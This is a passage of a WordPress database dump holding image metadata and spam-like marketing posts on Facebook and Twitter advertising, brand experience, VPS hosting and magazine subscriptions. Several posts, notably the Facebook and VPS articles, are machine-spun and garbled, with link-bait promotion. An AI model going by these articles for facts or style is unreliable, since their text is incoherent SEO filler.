file\";s:35:\"desk-cable-tidy-service-960x425.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(513,145,'_wp_attachment_image_alt','desk-cable-tidy-service'),(514,144,'_thumbnail_id','145'),(515,144,'wpmdr_menu','1'),(517,148,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(518,148,'_edit_last','1'),(519,148,'_edit_lock','1583144870:1'),(520,149,'_wp_attached_file','2020/03/office-work2.jpg'),(521,149,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:685;s:4:\"file\";s:24:\"2020/03/office-work2.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"office-work2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"office-work2-300x214.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"office-work2-768x548.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:548;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"hoot-medium-thumb\";a:4:{s:4:\"file\";s:24:\"office-work2-460x270.jpg\";s:5:\"width\";i:460;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"hoot-preview\";a:4:{s:4:\"file\";s:24:\"office-work2-465x332.jpg\";s:5:\"width\";i:465;s:6:\"height\";i:332;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hoot-large-thumb\";a:4:{s:4:\"file\";s:24:\"office-work2-690x500.jpg\";s:5:\"width\";i:690;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"hoot-preview-large\";a:4:{s:4:\"file\";s:24:\"office-work2-695x496.jpg\";s:5:\"width\";i:695;s:6:\"height\";i:496;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"hoot-wide\";a:4:{s:4:\"file\";s:24:\"office-work2-920x425.jpg\";s:5:\"width\";i:920;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hoot-extra-wide\";a:4:{s:4:\"file\";s:24:\"office-work2-960x425.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(522,149,'_wp_attachment_image_alt','The Importance of Office Cleaning Services'),(523,150,'_wp_attached_file','2020/03/relax.jpg'),(524,150,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:17:\"2020/03/relax.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"relax-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"relax-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"relax-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"hoot-medium-thumb\";a:4:{s:4:\"file\";s:17:\"relax-460x270.jpg\";s:5:\"width\";i:460;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"hoot-preview\";a:4:{s:4:\"file\";s:17:\"relax-465x310.jpg\";s:5:\"width\";i:465;s:6:\"height\";i:310;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hoot-large-thumb\";a:4:{s:4:\"file\";s:17:\"relax-690x500.jpg\";s:5:\"width\";i:690;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"hoot-preview-large\";a:4:{s:4:\"file\";s:17:\"relax-695x463.jpg\";s:5:\"width\";i:695;s:6:\"height\";i:463;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"hoot-wide\";a:4:{s:4:\"file\";s:17:\"relax-920x425.jpg\";s:5:\"width\";i:920;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hoot-extra-wide\";a:4:{s:4:\"file\";s:17:\"relax-960x425.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(525,150,'_wp_attachment_image_alt',''),(526,148,'_thumbnail_id','149'),(529,148,'wpmdr_menu','1'),(535,156,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(536,156,'_edit_last','1'),(537,156,'_edit_lock','1583171664:1'),(538,157,'_wp_attached_file','2020/03/business-meeting.jpg'),(539,157,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:28:\"2020/03/business-meeting.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"business-meeting-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"business-meeting-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"business-meeting-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"hoot-medium-thumb\";a:4:{s:4:\"file\";s:28:\"business-meeting-460x270.jpg\";s:5:\"width\";i:460;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"hoot-preview\";a:4:{s:4:\"file\";s:28:\"business-meeting-465x310.jpg\";s:5:\"width\";i:465;s:6:\"height\";i:310;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hoot-large-thumb\";a:4:{s:4:\"file\";s:28:\"business-meeting-690x500.jpg\";s:5:\"width\";i:690;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"hoot-preview-large\";a:4:{s:4:\"file\";s:28:\"business-meeting-695x463.jpg\";s:5:\"width\";i:695;s:6:\"height\";i:463;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"hoot-wide\";a:4:{s:4:\"file\";s:28:\"business-meeting-920x425.jpg\";s:5:\"width\";i:920;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hoot-extra-wide\";a:4:{s:4:\"file\";s:28:\"business-meeting-960x425.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"11\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:3:\"0.3\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(540,156,'_thumbnail_id','87'),(541,156,'_wpb_vc_js_status','false'),(542,156,'wpmdr_menu','1'),(543,149,'wpmdr_menu','1'),(544,150,'wpmdr_menu','1'),(545,157,'wpmdr_menu','1');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_posts`
--

DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=169 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_posts`
--

LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (5,1,'2018-02-06 09:45:06','2018-02-06 09:45:06','Every little one is on facebook! Everything that will this suggest for yourself and what\'s the key reason why factors marketing on facebook appropriate right now?\r\n\r\nArticle : Every little one is on facebook! Everything that will this suggest for yourself and what\'s the key reason why factors marketing on facebook appropriate right now? The result is easy my best mate simply look at the first number of Google after the clicks have been details reasonable and riches were becoming created all from men and women getting benefit of the visitors from Google, well and even facebook marketing it is having it a great entire new stage! You will find a innovative advertising system that is quickly getting the following greatest direction for online marketing the home structured enterprise or marketing and advertising some thing for example in addition is certainly facebook pay-per-click, since you may learn Google was in the past the foremost required marketing system for ppc ads however in earlier times a few weeks Google may be closing down home biz entrepreneurs company accounts, slapping business people balances remaining suitable and centre to the issue within which men and women obtain truly sacrificed their whole firms quickly given that Google has brought their visitors except for their website and as you recognize in the event you can\'t acquire website visitors you can not accomplish prospects and not having brings you cannot obtain a business.\r\n\r\nThere are plenty of of advantages for fb marketing lately that it is astounding! Facebook\'s pay per click marketing system helps you specialise in individuals by their pursuits as a way to convince particularly targeted customers for data inexpensive and then the cause the reason why you ought that can then be advertising on facebook great now is that cost-effective currently fb is definitely Google is in its early years &amp; riches have become to generally be produced. To earn over you commenced facebook marketing pay-per-click I created a video clip for understanding walking you thru tips on how to create your first ad; you can actually observe it on the net. Now fb pay-per-click is simply one benefit for marketing on facebook &amp; that is an advantage it actually is however acquire you found out about something recognized as social website marketing? Definitely it\'s likely you have, social networks are 21st century marketing actually in operation, making interactions, appeal advertising all that good stuff, well you can easily include social bookmarking using your fb pay-per-click by making an offer proper in your facebook fan web page which all over again creates connection. That is exclusively scrapping the counter with fb advertising when you get the connection constructing a some of it, expressing information, curiosity advertising that\'s in any league of that own along with all I even have provided in this time and age there is normally millions to get produced, deciding is yours.\r\n\r\nWeb Marketing Plus can offer you comprehensive advice regarding social media marketing. <a href=\"http://webmarketingplus.co.uk/specialist-advice.html\" target=\"_blank\" rel=\"noopener\">See the website for more information</a>!','Benefits associated with Facebook Marketing','','publish','open','open','','benefits-associated-with-facebook-marketing','','','2018-02-06 10:43:06','2018-02-06 10:43:06','',0,'https://ashbooks.co.uk/?p=5',0,'post','',0),(6,1,'2018-02-06 09:45:06','2018-02-06 09:45:06','Every little one is on facebook! Everything that will this suggest for yourself and what\'s the key reason why factors marketing on facebook appropriate right now?\r\n\r\nArticle : Every little one is on facebook! Everything that will this suggest for yourself and what\'s the key reason why factors marketing on facebook appropriate right now? The result is easy my best mate simply look at the first number of Google after the clicks have been details reasonable and riches were becoming created all from men and women getting benefit of the visitors from Google, well and even facebook marketing it is having it a great entire new stage! You will find a innovative advertising system that is quickly getting the following greatest direction for online marketing the home structured enterprise or marketing and advertising some thing for example in addition is certainly facebook pay-per-click, since you may learn Google was in the past the foremost required marketing system for ppc ads however in earlier times a few weeks Google may be closing down home biz entrepreneurs company accounts, slapping business people balances remaining suitable and centre to the issue within which men and women obtain truly sacrificed their whole firms quickly given that Google has brought their visitors except for their website and as you recognize in the event you can\'t acquire website visitors you can not accomplish prospects and not having brings you cannot obtain a business.\r\n\r\nThere are plenty of of advantages for fb marketing lately that it is astounding! Facebook\'s pay per click marketing system helps you specialise in individuals by their pursuits as a way to convince particularly targeted customers for data inexpensive and then the cause the reason why you ought that can then be advertising on facebook great now is that cost-effective currently fb is definitely Google is in its early years &amp; riches have become to generally be produced. To earn over you commenced facebook marketing pay-per-click I created a video clip for understanding walking you thru tips on how to create your first ad; you can actually observe it on the net. Now fb pay-per-click is simply one benefit for marketing on facebook &amp; that is an advantage it actually is however acquire you found out about something recognized as social website marketing? Definitely it\'s likely you have, social networks are 21st century marketing actually in operation, making interactions, appeal advertising all that good stuff, well you can easily include social bookmarking using your fb pay-per-click by making an offer proper in your facebook fan web page which all over again creates connection. That is exclusively scrapping the counter with fb advertising when you get the connection constructing a some of it, expressing information, curiosity advertising that\'s in any league of that own along with all I even have provided in this time and age there is normally millions to get produced, deciding is yours.','Benefits associated with Facebook Marketing','','inherit','closed','closed','','5-revision-v1','','','2018-02-06 09:45:06','2018-02-06 09:45:06','',5,'https://ashbooks.co.uk/5-revision-v1',0,'revision','',0),(7,1,'2019-02-06 09:45:22','2019-02-06 09:45:22','Since the field of marketing is faced with tough competition several new technologies are introduced for attracting and convincing the consumer.\r\n\r\n<strong>One of such strategies is through brand experience.</strong> It is indeed a unique approach for marketing goods through this method. The consumer on the other side will directly get involved with the product both in an emotional way and rational way. The customer should feel the pleasure of using the product and it should not be thrust on him by force.\r\n\r\nUnless the manufacturers have a clear idea about the nature of the target audience he cannot succeed in marketing the product. First, they should know the pulse of his audience for whom the product is marketed.\r\n\r\nSome products are meant only for women and some others are marketed for children alone. Due to the availability of several options, any customer will choose the product which gives him the best feel and experience instead of settling down on one brand alone. <a href=\"https://www.ionos.com/digitalguide/online-marketing/online-sales/gender-marketing-definition-and-implementation/\" target=\"_blank\" rel=\"noopener\">What is gender marketing?</a>\r\n\r\n<em>The consumer will first look for quality and next, he would find out the best priced product. </em>\r\n\r\nFor instance, in the product of bathing soap alone, you have thousands of brand and shapes ranging from inexpensive soaps to the most expensive soap. Hence a consumer will think and select the ideal brand taking into account the quality and price of the product. A marketer can get an idea if he thinks from the perspective of a consumer.\r\n\r\n<img class=\"alignnone size-full wp-image-141\" src=\"https://ashbooks.co.uk/wp-content/uploads/2019/02/marketing-help.jpg\" alt=\"Marketing help and advice\" width=\"960\" height=\"624\" />\r\n<h2>Improving the experience for customers</h2>\r\nProviding a clean and professional uniform for your employees can go a long way in presenting a smart and efficient team. When a customer approaches a member of staff in uniform, it gives a sense of consumer confidence as having the company\'s logo and name clearly stated shows that the business believes in their own products, services and everything else on offer. <a href=\"https://jppromotions.com.au/contact-us/\" target=\"_blank\" rel=\"noopener\">Click here</a> to contact a leading uniform supplier in WA.\r\n<h2>Concepts to include</h2>\r\nIt is necessary to bring in several concepts and new ideas for steering the pulse of the customer to use your product. Traditional marketing ideas will just create a virtual atmosphere of the product but now several companies are creating the real atmosphere so that the consumer can get the real feel of the product. <a href=\"https://iedunote.com/marketing-concept\" target=\"_blank\" rel=\"noopener\">Top marketing concepts</a>.\r\n\r\nWhile marketing, you have to engage all the senses of the audience to grab their attention. Include lot of powerful graphic elements in the advertisement for reaching the consumer quickly. It is possible to use the internet for spreading and marketing the new product free of cost.\r\n\r\nYou can now make use of <a href=\"https://www.convinceandconvert.com/content-marketing/secret-to-powerful-visual-content/\" target=\"_blank\" rel=\"noopener\">powerful visuals</a> to impress the audience visually. Once the product creates a good impression among the customers it will be hitting the market successfully. The idea of any marketing technique is to establish rapport between the consumers and the producers. If you have gained the confidence and support of the consumer, you can take it for granted that the consumer will come back to buy your product. By introducing the brand experience the marketer can create a good impression on the mindset of the audience which would certainly make an impact in buying the product.','Brand Experience Will Leave An Impact On The Consumer','','publish','open','open','','brand-experience-will-leave-an-impact-on-the-consumer','','','2019-03-07 10:14:09','2019-03-07 10:14:09','',0,'https://ashbooks.co.uk/?p=7',0,'post','',0),(8,1,'2018-02-06 09:45:22','2018-02-06 09:45:22','Since the field of marketing is faced with tough competition several new technologies are introduced for attracting and convincing the consumer. One of such strategies is through brand experience. It is indeed a unique approach for marketing goods through this method. The consumer on the other side will directly get involved with the product both in emotional way and rational way. The customer should feel the pleasure of using the product and it should not be thrust on him by force.\r\n\r\nUnless the manufacturers have clear idea about the nature of the target audience he cannot succeed on marketing the product. First they should know the pulse of his audience for whom the product is marketed. Some products are meant only for women and some others are marketed for children alone. Due to the availability of several options any customer will choose the product which gives him the best feel and experience instead of settling down on one brand alone.\r\n\r\nThe consumer will first look for quality and next he would find out the best priced product. For instance in the product of bathing soap alone you have thousands of brand and shapes ranging from inexpensive soaps to the most expensive soap. Hence a consumer will think and select the ideal brand taking into account the quality and price of the product. A marketer can get an idea if he thinks from the perspective of a consumer. It is necessary to bring in several concepts and new ideas for steering the pulse of the customer to use your product. Traditional marketing ideas will just create a virtual atmosphere of the product but now several companies are creating the real atmosphere so that the consumer can get the real feel of the product.\r\n\r\nWhile marketing, you have to engage all the senses of the audience to grab their attention. Include lot of powerful graphic elements in the advertisement for reaching the consumer quickly. It is possible to use internet for spreading and marketing the new product free of cost. You can now make use of powerful visuals to impress the audience visually. Once the product creates a good impression among the customers it will be hitting the market successfully. The idea of any marketing technique is to establish rapport between the consumers and the producers. If you have gained the confidence and support of the consumer, you can take it for granted that the consumer will come back to buy your product. By introducing the brand experience the marketer can create a good impression on the mindset of audience which would certainly make an impact in buying the product.\r\n\r\nFind the best &lt;a href=\"http://www.blazinstar.co.uk/experiential-marketing\"&gt;marketing communications agency&lt;/a&gt; who offes you brand activation, &lt;a href=\"http://www.blazinstar.co.uk/experiential-marketing\"&gt;publicity stunts&lt;/a&gt; and Marketing Agency London etc. Get more detail please visit online.','Brand Experience Will Leave An Impact On The Consumer','','inherit','closed','closed','','7-revision-v1','','','2018-02-06 09:45:22','2018-02-06 09:45:22','',7,'https://ashbooks.co.uk/7-revision-v1',0,'revision','',0),(9,1,'2018-02-06 09:45:45','2018-02-06 09:45:45','There are pretty sound reasons to remain at the forefront as far as adopting new trends is concerned. It could present you with an edge over your rivals. Nothing seems better to a web-based company than an edge, most importantly when the Internet marketing can appear to be ruthless. Internet-based businesses are constantly venturing into a transforming world of search engine optimization and social networking. It means enjoying a means to stay ahead of the competitors. Please read on to know how Twitter marketing is the best thing that your web promotional efforts require. Find out how to stay connected to your customers. <a href=\"http://googleplusblog.co.uk/services\" target=\"_blank\" rel=\"noopener\">Click here</a>.\r\n\r\nWhen you’re going to embrace a rapidly growing online marketing arena nowadays. Twitter already boasts 200 million active users – an ideal place to look for prospective customers if used precisely. Where it was rather tricky, Twitter has made it more straightforward than ever before to promote efficiently utilizing specific marketing program.\r\n\r\nStill, just how many internet marketers pay attention to this new trend of Twitter marketing? Think of what a lot of them could do with such powerful advertising tools. Executing these tools in your own company can help you save substantial amounts of time and ensure that you get that desired edge.\r\n\r\nTwitter has grown into one of the most effective social media programs around. Numerous individuals that include legislators, movie stars or even your next door neighbor are making use of Twitter to get connected and share with each other. This truth signifies that it is usually a significant marketing tool under the control of a sensible marketer. The main thing might be inside the quality of the follower lists or the contacts. They can frequently grow hurriedly, even exponentially. So when you advertise on Twitter, you can get a rapid and direct method to associate with similar individuals.\r\n\r\nMaking use of dedicated promotional software such as Tweet Adder, you can truly automate the procedure of getting the type of targeted Twitter users you necessitate to aid you in building up your exposure to moneymaking niche market members. Furthermore, it spares you plenty of time as well. It is merely one sort of tool. You can find others. Just look around and you will discover one that suits your requirements.\r\n\r\nWith an enquiry for users who have Tweeted specialized words, bio key phrases, or an utilization of their geographical location, the mentioned Twitter marketing software permits you that you can include these end users in your database directly. Think of having the capability to concentrate on many thousands of potential customers within just the span of moments. Hence, to advertise on Twitter, open an account in this social networking site straightway.','Advertise on Twitter to Take Advantage of this Powerful Marketing Tool','','publish','open','open','','advertise-on-twitter-to-take-advantage-of-this-powerful-marketing-tool','','','2018-02-06 10:43:17','2018-02-06 10:43:17','',0,'https://ashbooks.co.uk/?p=9',0,'post','',0),(10,1,'2018-02-06 09:45:45','2018-02-06 09:45:45','There are pretty sound reasons to remain at the forefront as far as adopting new trends is concerned. It could present you with an edge over your rivals. Nothing seems better to a web-based company than an edge, most importantly when the Internet marketing can appear to be ruthless. Internet-based businesses are constantly venturing into a transforming world of search engine optimization and social networking. It means enjoying a means to stay ahead of the competitors. Please read on to know how Twitter marketing is the best thing that your web promotional efforts require.\r\n\r\nWhen you’re going to embrace a rapidly growing online marketing arena nowadays. Twitter already boasts 200 million active users – an ideal place to look for prospective customers if used precisely. Where it was rather tricky, Twitter has made it more straightforward than ever before to promote efficiently utilizing specific marketing program.\r\n\r\nStill, just how many internet marketers pay attention to this new trend of Twitter marketing? Think of what a lot of them could do with such powerful advertising tools. Executing these tools in your own company can help you save substantial amounts of time and ensure that you get that desired edge.\r\n\r\nTwitter has grown into one of the most effective social media programs around. Numerous individuals that include legislators, movie stars or even your next door neighbor are making use of Twitter to get connected and share with each other. This truth signifies that it is usually a significant marketing tool under the control of a sensible marketer. The main thing might be inside the quality of the follower lists or the contacts. They can frequently grow hurriedly, even exponentially. So when you advertise on Twitter, you can get a rapid and direct method to associate with similar individuals.\r\n\r\nMaking use of dedicated promotional software such as Tweet Adder, you can truly automate the procedure of getting the type of targeted Twitter users you necessitate to aid you in building up your exposure to moneymaking niche market members. Furthermore, it spares you plenty of time as well. It is merely one sort of tool. You can find others. Just look around and you will discover one that suits your requirements.\r\n\r\nWith an enquiry for users who have Tweeted specialized words, bio key phrases, or an utilization of their geographical location, the mentioned Twitter marketing software permits you that you can include these end users in your database directly. Think of having the capability to concentrate on many thousands of potential customers within just the span of moments. Hence, to advertise on Twitter, open an account in this social networking site straightway.','Advertise on Twitter to Take Advantage of this Powerful Marketing Tool','','inherit','closed','closed','','9-revision-v1','','','2018-02-06 09:45:45','2018-02-06 09:45:45','',9,'https://ashbooks.co.uk/9-revision-v1',0,'revision','',0),(11,1,'2018-02-06 09:46:07','2018-02-06 09:46:07','A virtual proper server (VPS) is a technical platform for web hosting whereby a single web hosting server is partitioned or split up suspicion several virtual machines. Each virtual server is capable of enlarged its own operating system and control panel, also trust be independently rebooted. Some of the Advantages of VPS Technology are Isolation, Customer Self – Management, Unmatched Plesk Support, perceptive Resource Control, Complete control &amp; Administration, achievement Templates further Support, Migration, Easy Customer Upgrades, Backup and Restore, Secure. There are various benefits of California VPS: Virtual distinctive Servers offer numberless benefits over normal mutual web hosting being those who have outgrown their hosting accounts or need the bent a VPS implement can provide. Shared hosting, when one domain consumes giant amounts of the server resources, all the other websites on that server are affected and may experience quiescent loading pages. This doesn’t chance with virtual private servers. Because each VPS operates as if certain were a single server, others cannot lap up an impact on your projects. You’ll imitate in complete control of what operating system is installed, which control panel is used, how much memory is available, the size of your hard drive, and what applications are installed. Virtual peculiar servers adapt to growth, so you’ll never outgrow another web hosting plan. Virtual private servers offer end users a level of oversee that shared web hosting simply cannot. With a virtual private server, you’re in raid of everything. Los Angeles VPS owners can Root access, competence to install or uninstall software, complete control over mold files, power to remodel root resolution software. It’s essential with shared fretwork hosting accounts to have to go due to your collaboration provider to bear IP addresses or interrogate SSH access, and that’s not the situation harbour VPS. With a LA VPS each virtual partition operates correct groove on a real server, which means you’ll perform dramaturgy as design gaffer and can work in IP addresses or reboot your server whenever you need to. California Virtual private servers are far less expensive than an actual frenetic server. This article is about the Los Angeles VPS hosting that gives complete control to VPS owners. California VPS and LA VPS are completely customizable to whatever specifications you may require','Advantages of VPS Technology','','publish','open','open','','advantages-of-vps-technology','','','2018-02-06 10:43:22','2018-02-06 10:43:22','',0,'https://ashbooks.co.uk/?p=11',0,'post','',0),(12,1,'2018-02-06 09:46:07','2018-02-06 09:46:07','A virtual proper server (VPS) is a technical platform for web hosting whereby a single web hosting server is partitioned or split up suspicion several virtual machines. Each virtual server is capable of enlarged its own operating system and control panel, also trust be independently rebooted. Some of the Advantages of VPS Technology are Isolation, Customer Self – Management, Unmatched Plesk Support, perceptive Resource Control, Complete control &amp; Administration, achievement Templates further Support, Migration, Easy Customer Upgrades, Backup and Restore, Secure. There are various benefits of California VPS: Virtual distinctive Servers offer numberless benefits over normal mutual web hosting being those who have outgrown their hosting accounts or need the bent a VPS implement can provide. Shared hosting, when one domain consumes giant amounts of the server resources, all the other websites on that server are affected and may experience quiescent loading pages. This doesn’t chance with virtual private servers. Because each VPS operates as if certain were a single server, others cannot lap up an impact on your projects. You’ll imitate in complete control of what operating system is installed, which control panel is used, how much memory is available, the size of your hard drive, and what applications are installed. Virtual peculiar servers adapt to growth, so you’ll never outgrow another web hosting plan. Virtual private servers offer end users a level of oversee that shared web hosting simply cannot. With a virtual private server, you’re in raid of everything. Los Angeles VPS owners can Root access, competence to install or uninstall software, complete control over mold files, power to remodel root resolution software. It’s essential with shared fretwork hosting accounts to have to go due to your collaboration provider to bear IP addresses or interrogate SSH access, and that’s not the situation harbour VPS. With a LA VPS each virtual partition operates correct groove on a real server, which means you’ll perform dramaturgy as design gaffer and can work in IP addresses or reboot your server whenever you need to. California Virtual private servers are far less expensive than an actual frenetic server. This article is about the Los Angeles VPS hosting that gives complete control to VPS owners. California VPS and LA VPS are completely customizable to whatever specifications you may require','Advantages of VPS Technology','','inherit','closed','closed','','11-revision-v1','','','2018-02-06 09:46:07','2018-02-06 09:46:07','',11,'https://ashbooks.co.uk/11-revision-v1',0,'revision','',0),(13,1,'2018-02-06 09:46:27','2018-02-06 09:46:27','The cost of printing paper and production of magazines have risen considerably over the years. Consequently the cost of our favorite magazines has also shot through the skies. Hence it is getting more and more difficult to procure those prized possessions. Be it travel magazines or those sleek automobile magazines with your dream machines, the costs have risen sky high. Therefore it is sensible to choose a certain magazine and buy an annual subscription for the same, this will ensure a much lower price that the retail price of the particular issue.\r\n\r\nMost magazines offer half yearly, quarterly or annual subscription memberships at a much lower cost. From time to time some magazines also offer attractive discounts on memberships during certain times of the year. This is mostly a sales strategy aimed at achieving a target but it is a good deal for the readers.\r\n\r\nVarious wildlife magazines like Sanctuary and Wildlife Connect offer huge discounts to students since the magazine is mainly targeted at them. The subscription forms are generally available with the local vendors or at the back of the magazines which can be mailed along with the check. Some companies also send representatives at your door to collect the requisite amount and will deliver the magazines every month in your postal address.\r\n\r\nThe Times magazine is one of the most popular magazines and they also offer huge membership offers, apart form reduced cost, these periodicals also give discount coupons which can be availed at various pizza outlets and book stores. The duration of the subscription also affect the amount of discount that can be availed. If you book an annual subscription then you basically get 12 issues at the cost of mere 8 for a monthly magazine.\r\n\r\nOne of the most popular magazines in the music field is Rolling Stone. This particular magazine subscription offers many free issues with its annual subscription offers. Apart form huge discounts they also offer passes to rock shows for its members which are otherwise very hard to get. Hence it is sensible to go through the various offers before actually subscribing to one.\r\n\r\nThe magazine subscription trend has grown in popularity partly due to the growing fame of these magazines and partly due to the attractive offers. Also, with the advent of the internet, online issues are also available at a much lower cost; these are better and more environmentally friendly as there is no use of paper involved.\r\n\r\nThe magazine industry offers employment to many people and these offers are a way to keep the popularity of the magazines alive among the common mass, these magazines offer a glimpse into the world of the rich and famous and the ultimate and latest news in any field.\r\n\r\nThere are websites that offer subscription and attractive offers but many of them are fraudulent and are basically spams. So it is advisable to buy all your magazine subscriptions from one of the most trusted sites in this field, so visit 